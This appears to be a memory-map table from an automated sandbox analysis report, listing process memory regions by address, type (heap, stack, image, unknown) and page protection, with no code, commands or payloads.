||
400000
|
unkown image
|
page readonly
|
||
960000
|
heap private
|
page read and write
|
||
1E10000
|
heap private
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
2600000
|
unkown
|
page read and write
|
||
46E000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
375000
|
heap default
|
page read and write
|
||
393A000
|
unkown
|
page read and write
|
||
2DCC000
|
unkown
|
page read and write
|
||
7FF00040000
|
unkown
|
page read and write
|
||
24F2000
|
heap private
|
page read and write
|
||
170000
|
unkown image
|
page readonly
|
||
46A000
|
unkown image
|
page readonly
|
||
281F000
|
unkown
|
page read and write
|
||
467000
|
heap default
|
page read and write
|
||
7A4000
|
unkown image
|
page execute read
|
||
530000
|
unkown
|
page readonly
|
||
170000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
2F8E000
|
unkown
|
page read and write
|
||
7FF00207000
|
unkown
|
page read and write
|
||
2D94000
|
unkown
|
page read and write
|
||
4E4000
|
heap default
|
page read and write
|
||
2B2D000
|
unkown
|
page read and write
|
||
2320000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
2EC4000
|
unkown
|
page read and write
|
||
26E0000
|
unkown
|
page readonly
|
||
5D0000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
710000
|
unkown image
|
page readonly
|
||
B1E000
|
unkown
|
page read and write
|
||
24D0000
|
heap private
|
page read and write
|
||
3040000
|
heap private
|
page read and write
|
||
34DA000
|
unkown
|
page read and write
|
||
3AA000
|
unkown image
|
page readonly
|
||
60000
|
unkown
|
page readonly
|
||
340000
|
heap private
|
page read and write
|
||
345E000
|
unkown
|
page read and write
|
||
1E0000
|
unkown
|
page read and write
|
||
37D000
|
heap default
|
page read and write
|
||
5B0000
|
unkown
|
page readonly
|
||
3471000
|
unkown
|
page read and write
|
||
1C0000
|
heap default
|
page read and write
|
||
7FF00230000
|
unkown
|
page read and write
|
||
2A10000
|
heap private
|
page read and write
|
||
370000
|
heap default
|
page read and write
|
||
2E1000
|
unkown image
|
page execute and read and write
|
||
83A000
|
unkown image
|
page readonly
|
||
468000
|
unkown image
|
page write copy
|
||
2F70000
|
heap private
|
page read and write
|
||
34EF000
|
unkown
|
page read and write
|
||
300000
|
unkown
|
page readonly
|
||
2A07000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page read and write
|
||
3A0000
|
unkown
|
page readonly
|
||
368000
|
heap default
|
page read and write
|
||
6B0000
|
unkown
|
page readonly
|
||
2D0000
|
unkown
|
page read and write
|
||
2E8A000
|
unkown
|
page read and write
|
||
2444000
|
heap private
|
page read and write
|
||
6B0000
|
unkown
|
page readonly
|
||
423000
|
unkown image
|
page execute and read and write
|
||
465000
|
unkown image
|
page write copy
|
||
2127000
|
unkown
|
page readonly
|
||
850000
|
unkown
|
page read and write
|
||
3455000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
7C4000
|
unkown image
|
page read and write
|
||
450000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page readonly
|
||
420000
|
heap private
|
page read and write
|
||
360000
|
heap default
|
page read and write
|
||
191000
|
unkown image
|
page execute and read and write
|
||
2D67000
|
unkown
|
page read and write
|
||
3B8000
|
heap private
|
page read and write
|
||
1CA0000
|
unkown
|
page readonly
|
||
2670000
|
heap private
|
page read and write
|
||
AD0000
|
heap private
|
page read and write
|
||
2110000
|
heap private
|
page read and write
|
||
1F40000
|
unkown
|
page readonly
|
||
327000
|
heap default
|
page read and write
|
||
1DC000
|
unkown
|
page read and write
|
||
784000
|
unkown image
|
page execute read
|
||
1E90000
|
unkown
|
page readonly
|
||
160000
|
unkown
|
page readonly
|
||
1D8000
|
unkown image
|
page write copy
|
||
3A8000
|
unkown image
|
page write copy
|
||
94E000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2F0000
|
heap default
|
page read and write
|
||
160000
|
heap private
|
page read and write
|
||
12CA1000
|
unkown
|
page read and write
|
||
940000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
260000
|
heap private
|
page read and write
|
||
1D0000
|
unkown
|
page read and write
|
||
2E81000
|
unkown
|
page read and write
|
||
3086000
|
unkown
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
920000
|
unkown
|
page readonly
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
2B2F000
|
unkown
|
page read and write
|
||
236E000
|
stack
|
page read and write
|
||
7A2000
|
heap default
|
page read and write
|
||
2EDD000
|
unkown
|
page read and write
|
||
A5D000
|
unkown
|
page read and write
|
||
2EDA000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
A60000
|
unkown
|
page readonly
|
||
287E000
|
unkown
|
page read and write
|
||
390000
|
heap private
|
page read and write
|
||
CF0000
|
heap private
|
page read and write
|
||
557000
|
heap default
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
21C000
|
unkown
|
page read and write
|
||
26C000
|
unkown
|
page read and write
|
||
620000
|
unkown
|
page readonly
|
||
530000
|
unkown
|
page readonly
|
||
2D87000
|
unkown
|
page read and write
|
||
FC000
|
unkown
|
page read and write
|
||
9D0000
|
unkown
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
470000
|
heap default
|
page read and write
|
||
296000
|
unkown
|
page read and write
|
||
364000
|
unkown image
|
page execute read
|
||
ABF000
|
stack
|
page read and write
|
||
B5000
|
unkown
|
page read and write | page guard
|
||
2F9E000
|
stack
|
page read and write
|
||
7FF001F0000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
3474000
|
unkown
|
page read and write
|
||
33B7000
|
unkown
|
page read and write
|
||
296D000
|
unkown
|
page read and write
|
||
465000
|
unkown image
|
page write copy
|
||
20000
|
unkown
|
page readonly
|
||
390000
|
unkown
|
page readonly
|
||
2AA0000
|
unkown
|
page readonly
|
||
20F0000
|
unkown
|
page readonly
|
||
970000
|
unkown
|
page read and write
|
||
C00000
|
heap private
|
page read and write
|
||
1B379000
|
unkown
|
page read and write
|
||
2F0000
|
heap private
|
page read and write
|
||
6F6000
|
heap default
|
page read and write
|
||
DA000
|
stack
|
page read and write
|
||
1D8000
|
unkown image
|
page write copy
|
||
7FF000F0000
|
unkown
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
180000
|
heap private
|
page read and write
|
||
24E7000
|
unkown
|
page readonly
|
||
430000
|
heap default
|
page read and write
|
||
2B0000
|
heap private
|
page read and write
|
||
7FF00042000
|
unkown
|
page execute and read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
27D0000
|
unkown
|
page readonly
|
||
2B70000
|
heap private
|
page read and write
|
||
29BE000
|
unkown
|
page read and write
|
||
2674000
|
heap private
|
page read and write
|
||
D00000
|
heap private
|
page read and write
|
||
1C94000
|
heap private
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
7FF000F2000
|
unkown
|
page execute and read and write
|
||
1C760000
|
heap private
|
page read and write
|
||
781000
|
unkown image
|
page execute and read and write
|
||
1D0000
|
unkown
|
page read and write
|
||
2830000
|
unkown
|
page readonly
|
||
380000
|
heap private
|
page read and write
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
990000
|
heap private
|
page read and write
|
||
2EEE000
|
stack
|
page read and write
|
||
2E3000
|
unkown image
|
page execute and read and write
|
||
D00000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page read and write
|
||
1B3B9000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
7F4000
|
unkown image
|
page execute read
|
||
7FF0026A000
|
unkown
|
page execute and read and write
|
||
100000
|
unkown
|
page read and write
|
||
46D000
|
heap default
|
page read and write
|
||
340000
|
heap default
|
page read and write
|
||
29EA000
|
unkown
|
page read and write
|
||
430000
|
heap default
|
page read and write
|
||
23B2000
|
heap private
|
page read and write
|
||
2E27000
|
unkown
|
page read and write
|
||
1B450000
|
unkown
|
page readonly
|
||
410000
|
heap default
|
page read and write
|
||
660000
|
unkown
|
page readonly
|
||
2EE6000
|
unkown
|
page read and write
|
||
ABE000
|
unkown
|
page read and write
|
||
1B420000
|
unkown
|
page read and write
|
||
39A000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1E4B000
|
heap private
|
page read and write
|
||
2E68000
|
unkown
|
page read and write
|
||
230000
|
heap default
|
page read and write
|
||
290000
|
heap private
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page readonly
|
||
3002000
|
unkown
|
page read and write
|
||
2E0E000
|
unkown
|
page read and write
|
||
8D4000
|
heap private
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
2B2E000
|
unkown
|
page read and write | page guard
|
||
A70000
|
heap private
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
B02000
|
heap private
|
page read and write
|
||
2714000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
240000
|
heap default
|
page read and write
|
||
2394000
|
heap private
|
page read and write
|
||
26D0000
|
unkown
|
page read and write
|
||
2E30000
|
unkown
|
page read and write
|
||
2320000
|
unkown
|
page readonly
|
||
270F000
|
unkown
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
2F4000
|
heap private
|
page read and write
|
||
3481000
|
unkown
|
page read and write
|
||
774000
|
unkown image
|
page read and write
|
||
2127000
|
unkown
|
page readonly
|
||
279F000
|
unkown
|
page read and write
|
||
27C000
|
stack
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
A7E000
|
stack
|
page read and write
|
||
271F000
|
unkown
|
page read and write
|
||
300000
|
heap private
|
page read and write
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
2F0000
|
unkown
|
page read and write
|
||
730000
|
unkown
|
page read and write
|
||
2F8E000
|
unkown
|
page read and write
|
||
1F40000
|
unkown
|
page readonly
|
||
1C90000
|
heap private
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
2510000
|
unkown
|
page readonly
|
||
293E000
|
stack
|
page read and write
|
||
1BA80000
|
heap private
|
page read and write
|
||
2210000
|
unkown
|
page readonly
|
||
29F0000
|
heap private
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
297E000
|
stack
|
page read and write
|
||
2840000
|
unkown
|
page write copy
|
||
DC000
|
stack
|
page read and write
|
||
24D4000
|
heap private
|
page read and write
|
||
7FF00100000
|
unkown
|
page read and write
|
||
2B8000
|
heap private
|
page read and write
|
||
1AB90000
|
unkown
|
page read and write
|
||
5C0000
|
unkown
|
page readonly
|
||
2E12000
|
unkown
|
page read and write
|
||
2600000
|
unkown
|
page read and write
|
||
783000
|
unkown image
|
page execute and read and write
|
||
298000
|
heap private
|
page read and write
|
||
737000
|
heap default
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
2DD8000
|
unkown
|
page read and write
|
||
FE000
|
heap default
|
page read and write
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
2A2B000
|
unkown
|
page readonly
|
||
210000
|
unkown
|
page execute and read and write
|
||
1D4000
|
unkown image
|
page read and write
|
||
2320000
|
unkown
|
page readonly
|
||
2D2C000
|
unkown
|
page read and write
|
||
361000
|
unkown image
|
page execute and read and write
|
||
364000
|
heap default
|
page read and write
|
||
4B0000
|
heap default
|
page read and write
|
||
1BD000
|
heap default
|
page read and write
|
||
970000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page read and write
|
||
1B200000
|
unkown
|
page read and write
|
||
2E1A000
|
unkown
|
page read and write
|
||
310000
|
heap default
|
page read and write
|
||
293F000
|
stack
|
page read and write
|
||
2A50000
|
unkown
|
page readonly
|
||
5C0000
|
unkown
|
page readonly
|
||
ACE000
|
unkown
|
page read and write
|
||
880000
|
heap private
|
page read and write
|
||
382000
|
heap default
|
page read and write
|
||
670000
|
unkown
|
page readonly
|
||
340000
|
heap default
|
page read and write
|
||
6B0000
|
unkown
|
page readonly
|
||
28E6000
|
unkown
|
page read and write
|
||
34EB000
|
unkown
|
page read and write
|
||
34F2000
|
unkown
|
page read and write
|
||
1C3000
|
heap default
|
page read and write
|
||
2160000
|
unkown
|
page read and write
|
||
6BD000
|
heap default
|
page read and write
|
||
3083000
|
unkown
|
page read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
3D0000
|
heap private
|
page read and write
|
||
1B31B000
|
unkown
|
page read and write
|
||
A10000
|
unkown
|
page readonly
|
||
194000
|
unkown image
|
page execute read
|
||
2ED4000
|
unkown
|
page read and write
|
||
2DB000
|
stack
|
page read and write
|
||
740000
|
unkown
|
page readonly
|
||
1B4ED000
|
unkown
|
page read and write
|
||
A00000
|
unkown
|
page readonly
|
||
1CC000
|
unkown
|
page read and write
|
||
216000
|
unkown
|
page read and write
|
||
12B35000
|
unkown
|
page read and write
|
||
2EC0000
|
unkown
|
page read and write
|
||
6FB000
|
heap default
|
page read and write
|
||
AE0000
|
heap private
|
page read and write
|
||
4C0000
|
heap default
|
page read and write
|
||
430000
|
heap private
|
page read and write
|
||
89E000
|
unkown
|
page read and write
|
||
3C0000
|
unkown
|
page readonly
|
||
2E7D000
|
unkown
|
page read and write
|
||
7C8000
|
unkown image
|
page write copy
|
||
2480000
|
unkown
|
page readonly
|
||
28CE000
|
stack
|
page read and write
|
||
7FF00132000
|
unkown
|
page execute and read and write
|
||
2A0C000
|
unkown
|
page readonly
|
||
60000
|
unkown
|
page readonly
|
||
2320000
|
unkown
|
page readonly
|
||
194000
|
unkown image
|
page execute read
|
||
2660000
|
unkown
|
page read and write
|
||
468000
|
unkown image
|
page write copy
|
||
1C5AE000
|
unkown
|
page read and write
|
||
2EF0000
|
unkown
|
page read and write
|
||
12B31000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page write copy
|
||
2660000
|
unkown
|
page read and write
|
||
18F000
|
heap default
|
page read and write
|
||
724000
|
heap default
|
page read and write
|
||
2ADD000
|
unkown
|
page read and write
|
||
29F7000
|
heap private
|
page read and write
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
3553000
|
unkown
|
page read and write
|
||
9C000
|
unkown
|
page read and write
|
||
437000
|
heap default
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
||
570000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page readonly
|
||
920000
|
heap private
|
page read and write
|
||
F0000
|
heap default
|
page read and write
|
||
604000
|
heap default
|
page read and write
|
||
9D0000
|
heap private
|
page read and write
|
||
304D000
|
unkown
|
page read and write
|
||
301F000
|
unkown
|
page read and write
|
||
28DD000
|
stack
|
page read and write
|
||
466000
|
unkown image
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
E0000
|
unkown
|
page readonly
|
||
5E7000
|
heap default
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
870000
|
unkown
|
page read and write
|
||
2C0000
|
unkown image
|
page readonly
|
||
437000
|
heap default
|
page read and write
|
||
2A0000
|
heap private
|
page read and write
|
||
B00000
|
heap private
|
page read and write
|
||
7C0000
|
heap private
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
330000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2D97000
|
unkown
|
page read and write
|
||
1BB8D000
|
unkown
|
page read and write
|
||
21B000
|
unkown
|
page read and write
|
||
26FF000
|
unkown
|
page read and write
|
||
94E000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
2820000
|
unkown
|
page readonly
|
||
26D0000
|
unkown
|
page read and write
|
||
1C6EE000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page readonly
|
||
3442000
|
unkown
|
page read and write
|
||
3C0000
|
heap default
|
page read and write
|
||
421000
|
unkown image
|
page execute and read and write
|
||
7EA000
|
unkown image
|
page readonly
|
||
2660000
|
unkown
|
page read and write
|
||
2600000
|
unkown
|
page read and write
|
||
2D71000
|
unkown
|
page read and write
|
||
2180000
|
unkown
|
page readonly
|
||
1B0000
|
unkown
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
347000
|
heap default
|
page read and write
|
||
317000
|
heap default
|
page read and write
|
||
2FDE000
|
unkown
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
2440000
|
heap private
|
page read and write
|
||
1BA6000
|
unkown
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
1CB000
|
heap default
|
page read and write
|
||
520000
|
heap default
|
page read and write
|
||
356000
|
heap default
|
page read and write
|
||
700000
|
heap default
|
page read and write
|
||
29F4000
|
heap private
|
page read and write
|
||
430000
|
unkown
|
page readonly
|
||
2EF3000
|
unkown
|
page read and write
|
||
2600000
|
unkown
|
page write copy
|
||
2D60000
|
unkown
|
page read and write
|
||
260000
|
unkown
|
page read and write
|
||
7FF0004C000
|
unkown
|
page execute and read and write
|
||
2127000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
370000
|
unkown
|
page write copy
|
||
27E000
|
unkown
|
page read and write
|
||
3108000
|
unkown
|
page read and write
|
||
2690000
|
unkown
|
page readonly
|
||
3B0000
|
heap private
|
page read and write
|
||
3F0000
|
unkown
|
page readonly
|
||
30ED000
|
unkown
|
page read and write
|
||
77A000
|
unkown image
|
page readonly
|
||
3080000
|
unkown
|
page readonly
|
||
344000
|
heap private
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
26D0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2DB3000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page readonly
|
||
7FF002B0000
|
unkown
|
page execute and read and write
|
||
1A0000
|
heap private
|
page read and write
|
||
3445000
|
unkown
|
page read and write
|
||
1F0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
AA2000
|
heap private
|
page read and write
|
||
6F8000
|
heap default
|
page read and write
|
||
23D0000
|
unkown
|
page readonly
|
||
29CC000
|
unkown
|
page read and write
|
||
1C88E000
|
unkown
|
page read and write
|
||
967000
|
heap private
|
page read and write
|
||
2D8E000
|
unkown
|
page read and write
|
||
687000
|
heap default
|
page read and write
|
||
2E30000
|
unkown
|
page write copy
|
||
3432000
|
unkown
|
page read and write
|
||
2F3E000
|
stack
|
page read and write
|
||
1B42A000
|
unkown
|
page read and write
|
||
328000
|
unkown image
|
page write copy
|
||
670000
|
unkown
|
page readonly
|
||
130000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown image
|
page readonly
|
||
1DA000
|
unkown image
|
page readonly
|
||
61D000
|
heap default
|
page read and write
|
||
337000
|
heap default
|
page read and write
|
||
7CA000
|
unkown image
|
page readonly
|
||
1E0000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
134000
|
heap default
|
page read and write
|
||
820000
|
heap private
|
page read and write
|
||
8D0000
|
heap private
|
page read and write
|
||
617000
|
heap default
|
page read and write
|
||
2E44000
|
unkown
|
page read and write
|
||
26C000
|
unkown
|
page read and write
|
||
170000
|
heap private
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1E15000
|
heap private
|
page read and write
|
||
CB0000
|
heap private
|
page read and write
|
||
2A2000
|
unkown
|
page read and write
|
||
7A1000
|
unkown image
|
page execute and read and write
|
||
3285000
|
unkown
|
page read and write
|
||
7FF00105000
|
unkown
|
page read and write
|
||
2670000
|
unkown
|
page readonly
|
||
2E8E000
|
unkown
|
page read and write
|
||
7D0000
|
unkown image
|
page readonly
|
||
3A0000
|
unkown
|
page readonly
|
||
1D37000
|
unkown
|
page readonly
|
||
820000
|
unkown
|
page readonly
|
||
B40000
|
unkown
|
page readonly
|
||
620000
|
unkown
|
page readonly
|
||
314000
|
heap default
|
page read and write
|
||
1B430000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
29FE000
|
unkown
|
page read and write
|
||
5C0000
|
unkown
|
page readonly
|
||
424000
|
unkown image
|
page execute read
|
||
2390000
|
heap private
|
page read and write
|
||
22F7000
|
unkown
|
page readonly
|
||
1C0000
|
unkown
|
page read and write
|
||
778000
|
unkown image
|
page write copy
|
||
6B7000
|
heap default
|
page read and write
|
||
2320000
|
unkown
|
page readonly
|
||
2E23000
|
unkown
|
page read and write
|
||
466000
|
unkown image
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
3A4000
|
unkown image
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
2B66000
|
unkown
|
page read and write
|
||
C22000
|
heap private
|
page read and write
|
||
544000
|
heap default
|
page read and write
|
||
8F2000
|
heap private
|
page read and write
|
||
7FF00280000
|
unkown
|
page read and write
|
||
220000
|
unkown
|
page readonly
|
||
2980000
|
unkown
|
page readonly
|
||
423000
|
unkown image
|
page execute and read and write
|
||
2660000
|
unkown
|
page read and write
|
||
707000
|
heap default
|
page read and write
|
||
2E5D000
|
unkown
|
page read and write
|
||
2110000
|
unkown
|
page readonly
|
||
1B70000
|
unkown
|
page read and write
|
||
2E95000
|
unkown
|
page read and write
|
||
1D4000
|
heap default
|
page read and write
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
120000
|
unkown
|
page readonly
|
||
7FF0003A000
|
unkown
|
page execute and read and write
|
||
283A000
|
heap private
|
page execute and read and write
|
||
342F000
|
unkown
|
page read and write
|
||
5D0000
|
unkown
|
page readonly
|
||
2EB2000
|
unkown
|
page read and write
|
||
3AC0000
|
unkown
|
page read and write
|
||
3330000
|
unkown
|
page read and write
|
||
AE4000
|
heap private
|
page read and write
|
||
2692000
|
heap private
|
page read and write
|
||
2462000
|
heap private
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
29E5000
|
unkown
|
page read and write
|
||
1B3AA000
|
unkown
|
page read and write
|
||
2E63000
|
unkown
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
B40000
|
unkown
|
page readonly
|
||
2C0000
|
heap default
|
page read and write
|
||
55D000
|
heap default
|
page read and write
|
||
2DDD000
|
stack
|
page read and write
|
||
3ABC000
|
unkown
|
page read and write
|
||
24F0000
|
unkown
|
page readonly
|
||
680000
|
heap private
|
page read and write
|
||
37C000
|
heap default
|
page read and write
|
||
2A9C000
|
unkown
|
page read and write
|
||
2E4000
|
unkown image
|
page execute read
|
||
3B6000
|
heap default
|
page read and write
|
||
297E000
|
stack
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
193000
|
unkown image
|
page execute and read and write
|
||
AA0000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3B0000
|
unkown
|
page readonly
|
||
6CD000
|
heap default
|
page read and write
|
||
3006000
|
unkown
|
page read and write
|
||
C04000
|
heap private
|
page read and write
|
||
2FE3000
|
unkown
|
page read and write
|
||
2E73000
|
unkown
|
page read and write
|
||
6B4000
|
heap default
|
page read and write
|
||
26ED000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
73D000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
2780000
|
unkown
|
page read and write
|
||
9A0000
|
heap private
|
page read and write
|
||
3448000
|
unkown
|
page read and write
|
||
840000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page read and write
|
||
3458000
|
unkown
|
page read and write
|
||
21A000
|
stack
|
page read and write
|
||
438000
|
heap private
|
page read and write
|
||
3C9000
|
heap default
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
2F7000
|
heap default
|
page read and write
|
||
292F000
|
unkown
|
page read and write
|
||
1B310000
|
unkown
|
page read and write
|
||
1B398000
|
unkown
|
page read and write
|
||
296E000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
2D75000
|
unkown
|
page read and write
|
||
2CC000
|
stack
|
page read and write
|
||
22D7000
|
unkown
|
page readonly
|
||
2A90000
|
unkown
|
page readonly
|
||
4AF000
|
stack
|
page read and write
|
||
290000
|
unkown
|
page readonly
|
||
2127000
|
unkown
|
page readonly
|
||
655000
|
heap default
|
page read and write
|
||
30AF000
|
unkown
|
page read and write
|
||
362000
|
heap private
|
page read and write
|
||
12D80000
|
unkown
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
170000
|
unkown
|
page execute and read and write
|
||
834000
|
unkown image
|
page read and write
|
||
1DD0000
|
unkown
|
page readonly
|
||
7E8000
|
unkown image
|
page write copy
|
||
1B7E0000
|
unkown
|
page write copy
|
||
2EFF000
|
unkown
|
page read and write
|
||
342C000
|
unkown
|
page read and write
|
||
193000
|
unkown image
|
page execute and read and write
|
||
2C20000
|
heap private
|
page read and write
|
||
12DE2000
|
unkown
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
36E000
|
heap default
|
page read and write
|
||
1C5E0000
|
heap private
|
page read and write
|
||
3079000
|
unkown
|
page read and write
|
||
980000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
2DB0000
|
unkown
|
page read and write
|
||
1E0000
|
heap private
|
page read and write
|
||
4FD000
|
heap default
|
page read and write
|
||
680000
|
heap default
|
page read and write
|
||
1E00000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
990000
|
unkown
|
page read and write
|
||
2D91000
|
unkown
|
page read and write
|
||
2EE3000
|
unkown
|
page read and write
|
||
DC000
|
unkown
|
page read and write
|
||
1C70000
|
unkown
|
page readonly
|
||
28BE000
|
unkown
|
page read and write
|
||
24B0000
|
unkown
|
page readonly
|
||
346B000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
2660000
|
unkown
|
page read and write
|
||
3066000
|
unkown
|
page read and write
|
||
1BC000
|
unkown
|
page read and write
|
||
363000
|
unkown image
|
page execute and read and write
|
||
2660000
|
unkown
|
page read and write
|
||
2E0000
|
unkown
|
page readonly
|
||
6C7000
|
heap default
|
page read and write
|
||
1B8A0000
|
unkown
|
page read and write
|
||
3343000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
EF0000
|
heap private
|
page read and write
|
||
2E54000
|
unkown
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
7E4000
|
unkown image
|
page read and write
|
||
880000
|
unkown
|
page readonly
|
||
424000
|
unkown image
|
page execute read
|
||
2870000
|
heap private
|
page execute and read and write
|
||
220000
|
unkown
|
page read and write
|
||
A50000
|
heap private
|
page read and write
|
||
4F0000
|
unkown
|
page readonly
|
||
1F40000
|
unkown
|
page readonly
|
||
B0E000
|
unkown
|
page read and write
|
||
2127000
|
unkown
|
page readonly
|
||
780000
|
unkown image
|
page readonly
|
||
90000
|
unkown
|
page read and write
|
||
1C773000
|
heap private
|
page read and write
|
||
980000
|
unkown
|
page read and write
|
||
1F40000
|
unkown
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
1B424000
|
unkown
|
page read and write
|
||
1DE000
|
heap default
|
page read and write
|
||
CE0000
|
heap private
|
page read and write
|
||
2F02000
|
unkown
|
page read and write
|
||
2D8E000
|
unkown
|
page read and write
|
||
444000
|
heap private
|
page read and write
|
||
1F40000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page readonly
|
||
8D4000
|
heap private
|
page read and write
|
||
527000
|
heap default
|
page read and write
|
||
2B94000
|
unkown
|
page read and write
|
||
46A000
|
unkown image
|
page readonly
|
||
2EAC000
|
unkown
|
page read and write
|
||
2D81000
|
unkown
|
page read and write
|
||
1CB000
|
unkown
|
page read and write
|
||
2B75000
|
unkown
|
page read and write
|
||
12B5C000
|
unkown
|
page read and write
|
||
2127000
|
unkown
|
page readonly
|
||
7FF0010A000
|
unkown
|
page execute and read and write
|
||
7FF00170000
|
unkown
|
page read and write
|
||
327B000
|
unkown
|
page read and write
|
||
2DCD000
|
unkown
|
page read and write
|
||
29AE000
|
unkown
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
345B000
|
unkown
|
page read and write
|
||
32D000
|
heap default
|
page read and write
|
||
34D000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
7FF002A0000
|
unkown
|
page execute and read and write
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
710000
|
unkown image
|
page readonly
|
||
3B0000
|
heap private
|
page execute and read and write
|
||
180000
|
unkown
|
page read and write
|
||
1E3F000
|
unkown
|
page read and write
|
||
8F0000
|
heap private
|
page read and write
|
||
734000
|
unkown image
|
page execute read
|
||
2300000
|
unkown
|
page readonly
|
||
2E0000
|
unkown
|
page read and write
|
||
760000
|
unkown image
|
page readonly
|
||
454000
|
heap default
|
page read and write
|
||
67E000
|
heap default
|
page read and write
|
||
8F2000
|
heap private
|
page read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
410000
|
unkown
|
page readonly
|
||
29D0000
|
unkown
|
page readonly
|
||
B6000
|
unkown
|
page read and write
|
||
7FF00210000
|
unkown
|
page read and write
|
||
690000
|
heap default
|
page read and write
|
||
10A000
|
stack
|
page read and write
|
||
2127000
|
unkown
|
page readonly
|
||
4F7000
|
heap default
|
page read and write
|
||
300E000
|
unkown
|
page read and write
|
||
B1F000
|
stack
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
1F40000
|
unkown
|
page readonly
|
||
440000
|
unkown
|
page readonly
|
||
1B9000
|
heap default
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
2F1F000
|
unkown
|
page read and write
|
||
7FF00200000
|
unkown
